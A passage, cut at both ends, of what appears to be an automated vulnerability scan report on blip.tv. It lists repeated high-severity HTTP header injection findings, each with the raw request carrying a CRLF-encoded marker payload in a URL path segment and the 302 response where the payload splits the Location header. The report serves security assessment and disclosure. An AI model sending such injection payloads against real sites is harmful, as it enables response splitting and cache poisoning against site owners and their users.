User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/play/e6eea
0a912b6859e
/
Content-Type: text/html; charset=iso-8859-1
Content-Length: 284
Date: Thu, 20 Jan 2011 00:38:49 GMT
X-Varnish: 1248908777
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/play/e6eea
0a912b6859e/">he
...[SNIP]...

2.180. http://blip.tv/play/AYKY+jQC [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /play/AYKY+jQC

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload b6315%0d%0a813561f09f7 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /b6315%0d%0a813561f09f7/AYKY+jQC HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache/2.2.3 (CentOS)
Location: http://www.blip.tv/b6315
813561f09f7
/AYKY+jQC
Content-Type: text/html; charset=iso-8859-1
Content-Length: 302
Date: Thu, 20 Jan 2011 00:38:43 GMT
X-Varnish: 1248907746
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/b6315
813561f09f7/AYKY+jQC"
...[SNIP]...

2.181. http://blip.tv/play/AYKY+jQC [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /play/AYKY+jQC

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload bc569%0d%0ad3d84c47ba8 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /play/bc569%0d%0ad3d84c47ba8 HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/play/bc569
d3d84c47ba8

Content-Type: text/html; charset=iso-8859-1
Content-Length: 283
Date: Thu, 20 Jan 2011 00:38:44 GMT
X-Varnish: 1025269553
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/play/bc569
d3d84c47ba8">her
...[SNIP]...

2.182. http://blip.tv/play/AYKY+jQC/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /play/AYKY+jQC/

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 23c99%0d%0a090959020ae was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /23c99%0d%0a090959020ae/AYKY+jQC/ HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache/2.2.3 (CentOS)
Location: http://www.blip.tv/23c99
090959020ae
/AYKY+jQC/
Content-Type: text/html; charset=iso-8859-1
Content-Length: 303
Date: Thu, 20 Jan 2011 00:38:43 GMT
X-Varnish: 1324529866
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/23c99
090959020ae/AYKY+jQC/
...[SNIP]...

2.183. http://blip.tv/play/AYKY+jQC/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /play/AYKY+jQC/

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload 2ca83%0d%0a128c7cc92be was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /play/2ca83%0d%0a128c7cc92be/ HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/play/2ca83
128c7cc92be
/
Content-Type: text/html; charset=iso-8859-1
Content-Length: 284
Date: Thu, 20 Jan 2011 00:38:44 GMT
X-Varnish: 344229583
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/play/2ca83
128c7cc92be/">he
...[SNIP]...

2.184. http://blip.tv/play/AYKY31UC [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /play/AYKY31UC

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload eb535%0d%0a9e9b4f6a7b4 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /eb535%0d%0a9e9b4f6a7b4/AYKY31UC HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/eb535
9e9b4f6a7b4
/AYKY31UC
Content-Type: text/html; charset=iso-8859-1
Content-Length: 287
Date: Thu, 20 Jan 2011 00:38:45 GMT
X-Varnish: 2146048179
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/eb535
9e9b4f6a7b4/AYKY31UC"
...[SNIP]...

2.185. http://blip.tv/play/AYKY31UC [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /play/AYKY31UC

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload d91e6%0d%0ae9cbf33725c was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /play/d91e6%0d%0ae9cbf33725c HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/play/d91e6
e9cbf33725c

Content-Type: text/html; charset=iso-8859-1
Content-Length: 283
Date: Thu, 20 Jan 2011 00:38:45 GMT
X-Varnish: 1324530160
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/play/d91e6
e9cbf33725c">her
...[SNIP]...

2.186. http://blip.tv/play/AYKY31UC/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /play/AYKY31UC/

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 4f9cc%0d%0a40527a2d90f was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /4f9cc%0d%0a40527a2d90f/AYKY31UC/ HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/4f9cc
40527a2d90f
/AYKY31UC/
Content-Type: text/html; charset=iso-8859-1
Content-Length: 288
Date: Thu, 20 Jan 2011 00:38:48 GMT
X-Varnish: 1248908684
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/4f9cc
40527a2d90f/AYKY31UC/
...[SNIP]...

2.187. http://blip.tv/play/AYKY31UC/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /play/AYKY31UC/

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload 2679a%0d%0af81e182e5a5 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /play/2679a%0d%0af81e182e5a5/ HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/play/2679a
f81e182e5a5
/
Content-Type: text/html; charset=iso-8859-1
Content-Length: 284
Date: Thu, 20 Jan 2011 00:38:49 GMT
X-Varnish: 2146048843
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/play/2679a
f81e182e5a5/">he
...[SNIP]...

2.188. http://blip.tv/play/AYKZp2EC [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /play/AYKZp2EC

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 52d50%0d%0a0aea56bf3eb was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /52d50%0d%0a0aea56bf3eb/AYKZp2EC HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache/2.2.3 (CentOS)
Location: http://www.blip.tv/52d50
0aea56bf3eb
/AYKZp2EC
Content-Type: text/html; charset=iso-8859-1
Content-Length: 302
Date: Thu, 20 Jan 2011 00:38:42 GMT
X-Varnish: 1248907589
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/52d50
0aea56bf3eb/AYKZp2EC"
...[SNIP]...

2.189. http://blip.tv/play/AYKZp2EC [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /play/AYKZp2EC

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload 25f47%0d%0ae8af83f81dc was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /play/25f47%0d%0ae8af83f81dc HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/play/25f47
e8af83f81dc

Content-Type: text/html; charset=iso-8859-1
Content-Length: 283
Date: Thu, 20 Jan 2011 00:38:43 GMT
X-Varnish: 1248907651
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/play/25f47
e8af83f81dc">her
...[SNIP]...

2.190. http://blip.tv/play/AYKZp2EC/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /play/AYKZp2EC/

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 7b76c%0d%0a77c94b9702c was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /7b76c%0d%0a77c94b9702c/AYKZp2EC/ HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/7b76c
77c94b9702c
/AYKZp2EC/
Content-Type: text/html; charset=iso-8859-1
Content-Length: 288
Date: Thu, 20 Jan 2011 00:38:43 GMT
X-Varnish: 1025269306
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/7b76c
77c94b9702c/AYKZp2EC/
...[SNIP]...

2.191. http://blip.tv/play/AYKZp2EC/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /play/AYKZp2EC/

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload d2638%0d%0a6ef855d3c8b was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /play/d2638%0d%0a6ef855d3c8b/ HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/play/d2638
6ef855d3c8b
/
Content-Type: text/html; charset=iso-8859-1
Content-Length: 284
Date: Thu, 20 Jan 2011 00:38:43 GMT
X-Varnish: 2146047947
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/play/d2638
6ef855d3c8b/">he
...[SNIP]...

2.192. http://blip.tv/play/AYKc0AIC [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /play/AYKc0AIC

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 8d0e4%0d%0a0170a13e0d6 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /8d0e4%0d%0a0170a13e0d6/AYKc0AIC HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/8d0e4
0170a13e0d6
/AYKc0AIC
Content-Type: text/html; charset=iso-8859-1
Content-Length: 287
Date: Thu, 20 Jan 2011 00:38:40 GMT
X-Varnish: 1498218747
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/8d0e4
0170a13e0d6/AYKc0AIC"
...[SNIP]...

2.193. http://blip.tv/play/AYKc0AIC [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /play/AYKc0AIC

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload 6d2e1%0d%0ae5aa42e7cd7 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /play/6d2e1%0d%0ae5aa42e7cd7 HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/play/6d2e1
e5aa42e7cd7

Content-Type: text/html; charset=iso-8859-1
Content-Length: 283
Date: Thu, 20 Jan 2011 00:38:41 GMT
X-Varnish: 1248907258
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/play/6d2e1
e5aa42e7cd7">her
...[SNIP]...

2.194. http://blip.tv/play/AYKc0AIC/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /play/AYKc0AIC/

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload af3c1%0d%0a7e3157c4790 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /af3c1%0d%0a7e3157c4790/AYKc0AIC/ HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/af3c1
7e3157c4790
/AYKc0AIC/
Content-Type: text/html; charset=iso-8859-1
Content-Length: 288
Date: Thu, 20 Jan 2011 00:38:40 GMT
X-Varnish: 1324529371
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/af3c1
7e3157c4790/AYKc0AIC/
...[SNIP]...

2.195. http://blip.tv/play/AYKc0AIC/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /play/AYKc0AIC/

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload 88c5c%0d%0a4123e2554df was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /play/88c5c%0d%0a4123e2554df/ HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/play/88c5c
4123e2554df
/
Content-Type: text/html; charset=iso-8859-1
Content-Length: 284
Date: Thu, 20 Jan 2011 00:38:41 GMT
X-Varnish: 1248907308
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/play/88c5c
4123e2554df/">he
...[SNIP]...

2.196. http://blip.tv/play/AYKc93MC [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /play/AYKc93MC

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 30765%0d%0addbbb830a25 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /30765%0d%0addbbb830a25/AYKc93MC HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/30765
ddbbb830a25
/AYKc93MC
Content-Type: text/html; charset=iso-8859-1
Content-Length: 287
Date: Thu, 20 Jan 2011 00:38:40 GMT
X-Varnish: 2146047415
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/30765
ddbbb830a25/AYKc93MC"
...[SNIP]...

2.197. http://blip.tv/play/AYKc93MC [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /play/AYKc93MC

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload bbbd9%0d%0a90a0f111b1d was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /play/bbbd9%0d%0a90a0f111b1d HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/play/bbbd9
90a0f111b1d

Content-Type: text/html; charset=iso-8859-1
Content-Length: 283
Date: Thu, 20 Jan 2011 00:38:40 GMT
X-Varnish: 1324529310
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/play/bbbd9
90a0f111b1d">her
...[SNIP]...

2.198. http://blip.tv/play/AYKc93MC/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /play/AYKc93MC/

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload fb325%0d%0a32ab4049851 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /fb325%0d%0a32ab4049851/AYKc93MC/ HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/fb325
32ab4049851
/AYKc93MC/
Content-Type: text/html; charset=iso-8859-1
Content-Length: 288
Date: Thu, 20 Jan 2011 00:38:43 GMT
X-Varnish: 1324529851
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/fb325
32ab4049851/AYKc93MC/
...[SNIP]...

2.199. http://blip.tv/play/AYKc93MC/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /play/AYKc93MC/

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload 2f6c3%0d%0a2b45d599e82 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /play/2f6c3%0d%0a2b45d599e82/ HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/play/2f6c3
2b45d599e82
/
Content-Type: text/html; charset=iso-8859-1
Content-Length: 284
Date: Thu, 20 Jan 2011 00:38:43 GMT
X-Varnish: 2146047961
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/play/2f6c3
2b45d599e82/">he
...[SNIP]...

2.200. http://blip.tv/play/AYKcqGYC [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /play/AYKcqGYC

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload bb0b6%0d%0ab0c1664273c was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /bb0b6%0d%0ab0c1664273c/AYKcqGYC HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/bb0b6
b0c1664273c
/AYKcqGYC
Content-Type: text/html; charset=iso-8859-1
Content-Length: 287
Date: Thu, 20 Jan 2011 00:38:41 GMT
X-Varnish: 1324529445
Age: 0
Via: 1.1 varnish
Connection: close

